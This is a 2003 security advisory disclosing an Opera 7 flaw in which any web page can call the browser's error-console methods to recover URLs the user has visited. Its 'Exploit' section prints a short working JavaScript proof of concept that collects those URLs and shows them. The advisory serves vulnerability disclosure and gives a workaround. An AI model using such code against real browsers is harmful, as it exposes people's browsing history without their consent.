GreyMagic Security Advisory GM#006-OP ===================================== By GreyMagic Software, Israel. 04 Feb 2003. Available in HTML format at http://security.greymagic.com/adv/gm006-op/. Topic: Sniffing Opera's Tracks. Discovery date: 29 Jan 2003. Affected applications: ====================== Opera 7 (final). Introduction: ============= Opera recently released a new version of its browser. The new browser features a very useful Javascript console, which uses a few methods Opera implemented in the "opera" object. Discussion: =========== These methods appear in the comments of the "console.html" file as follows: * opera.errorIndex(): Returns the index of the last error message. This index is monotonically increasing (which limits us to about 2^53 errors per Opera session). * opera.errorMessage(i): Returns the error message at index i. The value returned may be #f, if that message has been flushed from the cache. Opera hadn't bothered to restrict these methods to certain credentials and they are available for any web page to use. At first glance this doesn't appear to be a big deal, but a short inspection of the generated error messages reveals that each of them contains the URL that threw the exception. In practice, this means that a web page can extract a list of all URLs the user had visited and that threw any exceptions. And since Opera pretends to be Internet Explorer by default, it often encounters errors in web pages. Harvesting visited URLs had never been this simple. Exploit: ======== The following code will generate a list of visited URLs: var sMsg, sFinal="", iLen=opera.errorIndex(); for (var iErr=0;iErr<iLen;iErr++) { sMsg=opera.errorMessage(iErr); if (sMsg && /(https?:\/\/\S+)/i.test(sMsg)) sFinal+=RegExp.$1+"\n"; } alert(sFinal); Demonstration: ============== A proof-of-concept demonstration of this issue is available at http://security.greymagic.com/adv/gm006-op/. Solution: ========= Until a patch becomes available, disable Javascript by going to: File -> Preferences -> Multimedia, and uncheck the "Enable JavaScript" item. Tested on: ========== Opera 7 NT4. Opera 7 Win98. Opera 7 Win2000. Opera 7 WinXP. Disclaimer: =========== The information in this advisory and any of its demonstrations is provided "as is" without warranty of any kind. GreyMagic Software is not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. Feedback: ========= Please mail any questions or comments to security@greymagic.com. - Copyright © 2003 GreyMagic Software.
